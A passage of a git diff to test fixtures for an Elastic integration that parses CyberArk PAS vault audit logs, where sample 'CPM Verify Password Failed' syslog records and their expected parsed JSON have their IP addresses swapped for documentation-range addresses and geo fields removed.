Code: 2103, Error: Error when verifypass to User root on Server . State: IM002 Native error: 0 Message: [Microsoft][ODBC Driver Manager] Data source name not found and no default driver specified\n","ExtraDetails":"address=127.0.0.1;username=root;","Message":"CPM Verify Password Failed","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"MySQL"},{"Name":"UserName","Value":"root"},{"Name":"Address","Value":"127.0.0.1"},{"Name":"ResetImmediately","Value":"VerifyTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"0"},{"Name":"LastFailDate","Value":"1615829597"},{"Name":"LastTask","Value":"VerifyTask"},{"Name":"Port","Value":"3306"},{"Name":"Database","Value":"test"},{"Name":"DSN","Value":"mysql"},{"Name":"CPMErrorDetails","Value":"Error when verifypass to User root on Server . State: IM002 Native error: 0 Message: [Microsoft][ODBC Driver Manager] Data source name not found and no default driver specified"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Database"}]}}}} <7>1 2021-03-15T17:38:27Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 10:38:27\n 2021-03-15T17:38:27Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 38\n CPM Verify Password Failed\n Error\n PasswordManager\n CPM Verify Password Failed\n \n \n partner\n Root\\Database-MySQL-10.0.1.20-root\n 10.0.1.20\n \n \n \n ImmediateTask. Failure Description: CACPM344E Verifying Password Safe: partner, Folder: Root, Object: Database-MySQL-10.0.1.20-root failed (try #0). Code: 2103, Error: Error when verifypass to User root on Server . State: HY090 Native error: 0 Message: [Microsoft][ODBC Driver Manager] Invalid string or buffer length\n\n address=127.0.0.1;username=root;\n CPM Verify Password Failed\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 10:38:27","IsoTimestamp":"2021-03-15T17:38:27Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"38","Desc":"CPM Verify Password Failed","Severity":"Error","Issuer":"PasswordManager","Action":"CPM Verify Password Failed","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Database-MySQL-10.0.1.20-root","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"ImmediateTask. Failure Description: CACPM344E Verifying Password Safe: partner, Folder: Root, Object: Database-MySQL-10.0.1.20-root failed (try #0). Code: 2103, Error: Error when verifypass to User root on Server . State: HY090 Native error: 0 Message: [Microsoft][ODBC Driver Manager] Invalid string or buffer length\n","ExtraDetails":"address=127.0.0.1;username=root;","Message":"CPM Verify Password Failed","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"MySQL"},{"Name":"UserName","Value":"root"},{"Name":"Address","Value":"127.0.0.1"},{"Name":"ResetImmediately","Value":"VerifyTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"0"},{"Name":"LastFailDate","Value":"1615829907"},{"Name":"LastTask","Value":"VerifyTask"},{"Name":"Port","Value":"3306"},{"Name":"Database","Value":"test"},{"Name":"DSN","Value":"Driver={MySQL ODBC 5.3 Unicode Driver};server=%ADDRESS%;user=%USER%;option=3;port=%PORT%;Password=%LOGONPASSWORD%"},{"Name":"CPMErrorDetails","Value":"Error when verifypass to User root on Server . State: HY090 Native error: 0 Message: [Microsoft][ODBC Driver Manager] Invalid string or buffer length"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Database"}]}}}} <7>1 2021-03-15T18:00:07Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 11:00:07\n 2021-03-15T18:00:07Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 38\n CPM Verify Password Failed\n Error\n PasswordManager\n CPM Verify Password Failed\n \n \n partner\n Root\\Database-MySQL-10.0.1.20-root\n 10.0.1.20\n \n \n \n ImmediateTask. Failure Description: CACPM344E Verifying Password Safe: partner, Folder: Root, Object: Database-MySQL-10.0.1.20-root failed (try #0). Code: 2103, Error: Error when verifypass to User root on Server . State: IM002 Native error: 0 Message: [Microsoft][ODBC Driver Manager] Data source name not found and no default driver specified\n\n address=Driver\\={MySQL ODBC 5.3 Unicode Driver}\\;server\\=127.0.0.1\\;user\\=root\\;option\\=3\\;port\\=3306\\;Password\\=1234;username=root;\n CPM Verify Password Failed\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 11:00:07","IsoTimestamp":"2021-03-15T18:00:07Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"38","Desc":"CPM Verify Password Failed","Severity":"Error","Issuer":"PasswordManager","Action":"CPM Verify Password Failed","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Database-MySQL-10.0.1.20-root","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"ImmediateTask. Failure Description: CACPM344E Verifying Password Safe: partner, Folder: Root, Object: Database-MySQL-10.0.1.20-root failed (try #0). Code: 2103, Error: Error when verifypass to User root on Server . State: IM002 Native error: 0 Message: [Microsoft][ODBC Driver Manager] Data source name not found and no default driver specified\n","ExtraDetails":"address=Driver\\={MySQL ODBC 5.3 Unicode Driver}\\;server\\=127.0.0.1\\;user\\=root\\;option\\=3\\;port\\=3306\\;Password\\=1234;username=root;","Message":"CPM Verify Password Failed","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"MySQL"},{"Name":"UserName","Value":"root"},{"Name":"Address","Value":"Driver={MySQL ODBC 5.3 Unicode Driver};server=127.0.0.1;user=root;option=3;port=3306;Password=1234"},{"Name":"ResetImmediately","Value":"VerifyTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"0"},{"Name":"LastFailDate","Value":"1615831206"},{"Name":"LastTask","Value":"VerifyTask"},{"Name":"Port","Value":"3306"},{"Name":"Database","Value":"test"},{"Name":"DSN","Value":"mysql"},{"Name":"CPMErrorDetails","Value":"Error when verifypass to User root on Server . State: IM002 Native error: 0 Message: [Microsoft][ODBC Driver Manager] Data source name not found and no default driver specified"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Database"}]}}}} -<7>1 2021-03-15T18:05:16Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 11:05:16\n 2021-03-15T18:05:16Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 38\n CPM Verify Password Failed\n Error\n PasswordManager\n CPM Verify Password Failed\n \n \n partner\n Root\\Operating System-WinDomain-34.66.114.180-ELASTICbart\n 10.0.1.20\n \n \n \n ImmediateTask,Failure. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-34.66.114.180-ELASTICbart failed (try #3). Code: 2101, Error: Error in verifypass to user 34.66.114.180\\ELASTIC.local\\bart on domain 34.66.114.180(\\\\34.66.114.180). Reason: The specified username is invalid. (winRc=2202). \n\n address=34.66.114.180;retriescount=3;username=ELASTIC.local\\bart;\n CPM Verify Password Failed\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 11:05:16","IsoTimestamp":"2021-03-15T18:05:16Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"38","Desc":"CPM Verify Password Failed","Severity":"Error","Issuer":"PasswordManager","Action":"CPM Verify Password Failed","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-WinDomain-34.66.114.180-ELASTICbart","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"ImmediateTask,Failure. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-34.66.114.180-ELASTICbart failed (try #3). Code: 2101, Error: Error in verifypass to user 34.66.114.180\\ELASTIC.local\\bart on domain 34.66.114.180(\\\\34.66.114.180). Reason: The specified username is invalid. (winRc=2202). \n","ExtraDetails":"address=34.66.114.180;retriescount=3;username=ELASTIC.local\\bart;","Message":"CPM Verify Password Failed","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"WinDomain"},{"Name":"UserName","Value":"ELASTIC.local\\bart"},{"Name":"Address","Value":"34.66.114.180"},{"Name":"ResetImmediately","Value":"VerifyTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"3"},{"Name":"LastFailDate","Value":"1615831516"},{"Name":"LastTask","Value":"VerifyTask"},{"Name":"LogonDomain","Value":"34.66.114.180"},{"Name":"CPMErrorDetails","Value":"Error in verifypass to user 34.66.114.180\\ELASTIC.local\\bart on domain 34.66.114.180(\\\\34.66.114.180). Reason: The specified username is invalid. (winRc=2202). "},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} -<7>1 2021-03-16T09:50:19Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 16 02:50:19\n 2021-03-16T09:50:19Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 38\n CPM Verify Password Failed\n Error\n PasswordManager\n CPM Verify Password Failed\n \n \n partner\n Root\\Operating System-WinDomain-34.66.114.180-ELASTICbart\n 10.0.1.20\n \n \n \n ImmediateTask,Failure. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-34.66.114.180-ELASTICbart failed (try #4). Code: 2101, Error: Error in verifypass to user 34.66.114.180\\ELASTIC.local\\bart on domain 34.66.114.180(\\\\34.66.114.180). Reason: The specified username is invalid. (winRc=2202). \n\n address=34.66.114.180;retriescount=4;username=ELASTIC.local\\bart;\n CPM Verify Password Failed\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 16 02:50:19","IsoTimestamp":"2021-03-16T09:50:19Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"38","Desc":"CPM Verify Password Failed","Severity":"Error","Issuer":"PasswordManager","Action":"CPM Verify Password Failed","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-WinDomain-34.66.114.180-ELASTICbart","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"ImmediateTask,Failure. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-34.66.114.180-ELASTICbart failed (try #4). Code: 2101, Error: Error in verifypass to user 34.66.114.180\\ELASTIC.local\\bart on domain 34.66.114.180(\\\\34.66.114.180). Reason: The specified username is invalid. (winRc=2202). \n","ExtraDetails":"address=34.66.114.180;retriescount=4;username=ELASTIC.local\\bart;","Message":"CPM Verify Password Failed","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"WinDomain"},{"Name":"UserName","Value":"ELASTIC.local\\bart"},{"Name":"Address","Value":"34.66.114.180"},{"Name":"ResetImmediately","Value":"VerifyTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"4"},{"Name":"LastFailDate","Value":"1615888216"},{"Name":"LastTask","Value":"VerifyTask"},{"Name":"LogonDomain","Value":"34.66.114.180"},{"Name":"CPMErrorDetails","Value":"Error in verifypass to user 34.66.114.180\\ELASTIC.local\\bart on domain 34.66.114.180(\\\\34.66.114.180). Reason: The specified username is invalid. (winRc=2202). "},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} +<7>1 2021-03-15T18:05:16Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 11:05:16\n 2021-03-15T18:05:16Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 38\n CPM Verify Password Failed\n Error\n PasswordManager\n CPM Verify Password Failed\n \n \n partner\n Root\\Operating System-WinDomain-67.43.156.15-ELASTICbart\n 10.0.1.20\n \n \n \n ImmediateTask,Failure. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-67.43.156.15-ELASTICbart failed (try #3). Code: 2101, Error: Error in verifypass to user 67.43.156.15\\ELASTIC.local\\bart on domain 67.43.156.15(\\\\67.43.156.15). Reason: The specified username is invalid. (winRc=2202). \n\n address=67.43.156.15;retriescount=3;username=ELASTIC.local\\bart;\n CPM Verify Password Failed\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 11:05:16","IsoTimestamp":"2021-03-15T18:05:16Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"38","Desc":"CPM Verify Password Failed","Severity":"Error","Issuer":"PasswordManager","Action":"CPM Verify Password Failed","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-WinDomain-67.43.156.15-ELASTICbart","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"ImmediateTask,Failure. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-67.43.156.15-ELASTICbart failed (try #3). Code: 2101, Error: Error in verifypass to user 67.43.156.15\\ELASTIC.local\\bart on domain 67.43.156.15(\\\\67.43.156.15). Reason: The specified username is invalid. (winRc=2202). \n","ExtraDetails":"address=67.43.156.15;retriescount=3;username=ELASTIC.local\\bart;","Message":"CPM Verify Password Failed","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"WinDomain"},{"Name":"UserName","Value":"ELASTIC.local\\bart"},{"Name":"Address","Value":"67.43.156.15"},{"Name":"ResetImmediately","Value":"VerifyTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"3"},{"Name":"LastFailDate","Value":"1615831516"},{"Name":"LastTask","Value":"VerifyTask"},{"Name":"LogonDomain","Value":"67.43.156.15"},{"Name":"CPMErrorDetails","Value":"Error in verifypass to user 67.43.156.15\\ELASTIC.local\\bart on domain 67.43.156.15(\\\\67.43.156.15). Reason: The specified username is invalid. (winRc=2202). "},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} +<7>1 2021-03-16T09:50:19Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 16 02:50:19\n 2021-03-16T09:50:19Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 38\n CPM Verify Password Failed\n Error\n PasswordManager\n CPM Verify Password Failed\n \n \n partner\n Root\\Operating System-WinDomain-67.43.156.15-ELASTICbart\n 10.0.1.20\n \n \n \n ImmediateTask,Failure. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-67.43.156.15-ELASTICbart failed (try #4). Code: 2101, Error: Error in verifypass to user 67.43.156.15\\ELASTIC.local\\bart on domain 67.43.156.15(\\\\67.43.156.15). Reason: The specified username is invalid. (winRc=2202). \n\n address=67.43.156.15;retriescount=4;username=ELASTIC.local\\bart;\n CPM Verify Password Failed\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 16 02:50:19","IsoTimestamp":"2021-03-16T09:50:19Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"38","Desc":"CPM Verify Password Failed","Severity":"Error","Issuer":"PasswordManager","Action":"CPM Verify Password Failed","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-WinDomain-67.43.156.15-ELASTICbart","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"ImmediateTask,Failure. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-67.43.156.15-ELASTICbart failed (try #4). Code: 2101, Error: Error in verifypass to user 67.43.156.15\\ELASTIC.local\\bart on domain 67.43.156.15(\\\\67.43.156.15). Reason: The specified username is invalid. (winRc=2202). \n","ExtraDetails":"address=67.43.156.15;retriescount=4;username=ELASTIC.local\\bart;","Message":"CPM Verify Password Failed","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"WinDomain"},{"Name":"UserName","Value":"ELASTIC.local\\bart"},{"Name":"Address","Value":"67.43.156.15"},{"Name":"ResetImmediately","Value":"VerifyTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"4"},{"Name":"LastFailDate","Value":"1615888216"},{"Name":"LastTask","Value":"VerifyTask"},{"Name":"LogonDomain","Value":"67.43.156.15"},{"Name":"CPMErrorDetails","Value":"Error in verifypass to user 67.43.156.15\\ELASTIC.local\\bart on domain 67.43.156.15(\\\\67.43.156.15). Reason: The specified username is invalid. (winRc=2202). "},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-38-cpm-verify-password-failed.log-expected.json b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-38-cpm-verify-password-failed.log-expected.json index df135761b1f..b2aec9f1215 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-38-cpm-verify-password-failed.log-expected.json +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-38-cpm-verify-password-failed.log-expected.json @@ -7,22 +7,11 @@ } }, "destination": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-VA", - "country_name": "United States", - "region_name": "Virginia", - "location": { - "lon": -77.2481, - "lat": 38.6583 - }, - "country_iso_code": "US" - }, - "address": "34.66.114.180", "user": { "name": "ELASTIC\\bart" }, - "ip": "34.66.114.180" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "source": { "user": { @@ -45,7 +34,7 @@ }, "@timestamp": "2021-03-15T13:19:58.000Z", "file": { - "path": "Root\\Operating System-WinDomain-35.192.121.42-ELASTICbart" + "path": "Root\\Operating System-WinDomain-67.43.156.14-ELASTICbart" }, "ecs": { "version": "1.12.0" @@ -57,27 +46,27 @@ ], "ip": [ "10.0.1.20", - "34.66.114.180" + "67.43.156.15" ] }, "cyberarkpas": { "audit": { "severity": "Error", - "reason": "ImmediateTask. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-35.192.121.42-ELASTICbart failed (try #0). Code: 2101, Error: Error in verifypass to user 34.66.114.180\\ELASTIC\\bart on domain 34.66.114.180(\\\\34.66.114.180). Reason: The specified username is invalid. (winRc=2202). \n", + "reason": "ImmediateTask. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-67.43.156.14-ELASTICbart failed (try #0). Code: 2101, Error: Error in verifypass to user 67.43.156.15\\ELASTIC\\bart on domain 67.43.156.15(\\\\67.43.156.15). Reason: The specified username is invalid. (winRc=2202). \n", "iso_timestamp": "2021-03-15T13:19:58Z", - "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 15 06:19:58\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-15T13:19:58Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e38\u003c/MessageID\u003e\n \u003cDesc\u003eCPM Verify Password Failed\u003c/Desc\u003e\n \u003cSeverity\u003eError\u003c/Severity\u003e\n \u003cIssuer\u003ePasswordManager\u003c/Issuer\u003e\n \u003cAction\u003eCPM Verify Password Failed\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003epartner\u003c/Safe\u003e\n \u003cFile\u003eRoot\\Operating System-WinDomain-35.192.121.42-ELASTICbart\u003c/File\u003e\n \u003cStation\u003e10.0.1.20\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003eImmediateTask. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-35.192.121.42-ELASTICbart failed (try #0). Code: 2101, Error: Error in verifypass to user 34.66.114.180\\ELASTIC\\bart on domain 34.66.114.180(\\\\34.66.114.180). Reason: The specified username is invalid. (winRc=2202). \n\u003c/Reason\u003e\n \u003cExtraDetails\u003eaddress=34.66.114.180;username=ELASTIC\\bart;\u003c/ExtraDetails\u003e\n \u003cMessage\u003eCPM Verify Password Failed\u003c/Message\u003e\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\n \u003cCAProperties\u003e\n \u003cCAProperty Name=\"PolicyID\" Value=\"WinDomain\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"UserName\" Value=\"ELASTIC\\bart\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"Address\" Value=\"34.66.114.180\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"ResetImmediately\" Value=\"VerifyTask\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CPMStatus\" Value=\"failure\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"RetriesCount\" Value=\"0\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastFailDate\" Value=\"1615814397\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastTask\" Value=\"VerifyTask\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LogonDomain\" Value=\"34.66.114.180\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CPMErrorDetails\" Value=\"Error in verifypass to user 34.66.114.180\\ELASTIC\\bart on domain 34.66.114.180(\\\\34.66.114.180). Reason: The specified username is invalid. (winRc=2202). \"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CreationMethod\" Value=\"PVWA\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"DeviceType\" Value=\"Operating System\"\u003e\u003c/CAProperty\u003e\n \u003c/CAProperties\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", + "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 15 06:19:58\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-15T13:19:58Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e38\u003c/MessageID\u003e\n \u003cDesc\u003eCPM Verify Password Failed\u003c/Desc\u003e\n \u003cSeverity\u003eError\u003c/Severity\u003e\n \u003cIssuer\u003ePasswordManager\u003c/Issuer\u003e\n \u003cAction\u003eCPM Verify Password Failed\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003epartner\u003c/Safe\u003e\n \u003cFile\u003eRoot\\Operating System-WinDomain-67.43.156.14-ELASTICbart\u003c/File\u003e\n \u003cStation\u003e10.0.1.20\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003eImmediateTask. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-67.43.156.14-ELASTICbart failed (try #0). Code: 2101, Error: Error in verifypass to user 67.43.156.15\\ELASTIC\\bart on domain 67.43.156.15(\\\\67.43.156.15). Reason: The specified username is invalid. (winRc=2202). \n\u003c/Reason\u003e\n \u003cExtraDetails\u003eaddress=67.43.156.15;username=ELASTIC\\bart;\u003c/ExtraDetails\u003e\n \u003cMessage\u003eCPM Verify Password Failed\u003c/Message\u003e\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\n \u003cCAProperties\u003e\n \u003cCAProperty Name=\"PolicyID\" Value=\"WinDomain\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"UserName\" Value=\"ELASTIC\\bart\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"Address\" Value=\"67.43.156.15\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"ResetImmediately\" Value=\"VerifyTask\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CPMStatus\" Value=\"failure\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"RetriesCount\" Value=\"0\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastFailDate\" Value=\"1615814397\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastTask\" Value=\"VerifyTask\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LogonDomain\" Value=\"67.43.156.15\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CPMErrorDetails\" Value=\"Error in verifypass to user 67.43.156.15\\ELASTIC\\bart on domain 67.43.156.15(\\\\67.43.156.15). Reason: The specified username is invalid. (winRc=2202). \"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CreationMethod\" Value=\"PVWA\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"DeviceType\" Value=\"Operating System\"\u003e\u003c/CAProperty\u003e\n \u003c/CAProperties\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", "message": "CPM Verify Password Failed", "issuer": "PasswordManager", "extra_details": { "other": { - "address": "34.66.114.180" + "address": "67.43.156.15" }, "username": "ELASTIC\\bart" }, "rfc5424": true, "ca_properties": { "other": {}, - "address": "34.66.114.180", + "address": "67.43.156.15", "creation_method": "PVWA", "cpm_status": "failure", "policy_id": "WinDomain", @@ -86,11 +75,11 @@ "retries_count": "0", "reset_immediately": "VerifyTask", "last_task": "VerifyTask", - "cpm_error_details": "Error in verifypass to user 34.66.114.180\\ELASTIC\\bart on domain 34.66.114.180(\\\\34.66.114.180). Reason: The specified username is invalid. (winRc=2202). ", + "cpm_error_details": "Error in verifypass to user 67.43.156.15\\ELASTIC\\bart on domain 67.43.156.15(\\\\67.43.156.15). Reason: The specified username is invalid. (winRc=2202). ", "last_fail_date": "1615814397", - "logon_domain": "34.66.114.180" + "logon_domain": "67.43.156.15" }, - "file": "Root\\Operating System-WinDomain-35.192.121.42-ELASTICbart", + "file": "Root\\Operating System-WinDomain-67.43.156.14-ELASTICbart", "safe": "partner", "station": "10.0.1.20", "action": "CPM Verify Password Failed", @@ -103,9 +92,9 @@ }, "event": { "severity": 7, - "reason": "Error in verifypass to user 34.66.114.180\\ELASTIC\\bart on domain 34.66.114.180(\\\\34.66.114.180). Reason: The specified username is invalid. (winRc=2202). ", - "ingested": "2021-06-09T10:24:34.493868300Z", - "original": "\u003c7\u003e1 2021-03-15T13:19:58Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 15 06:19:58\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-15T13:19:58Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e38\u003c/MessageID\u003e\\n \u003cDesc\u003eCPM Verify Password Failed\u003c/Desc\u003e\\n \u003cSeverity\u003eError\u003c/Severity\u003e\\n \u003cIssuer\u003ePasswordManager\u003c/Issuer\u003e\\n \u003cAction\u003eCPM Verify Password Failed\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003epartner\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-WinDomain-35.192.121.42-ELASTICbart\u003c/File\u003e\\n \u003cStation\u003e10.0.1.20\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003eImmediateTask. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-35.192.121.42-ELASTICbart failed (try #0). Code: 2101, Error: Error in verifypass to user 34.66.114.180\\\\ELASTIC\\\\bart on domain 34.66.114.180(\\\\\\\\34.66.114.180). Reason: The specified username is invalid. (winRc=2202). \\n\u003c/Reason\u003e\\n \u003cExtraDetails\u003eaddress=34.66.114.180;username=ELASTIC\\\\bart;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eCPM Verify Password Failed\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"WinDomain\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" 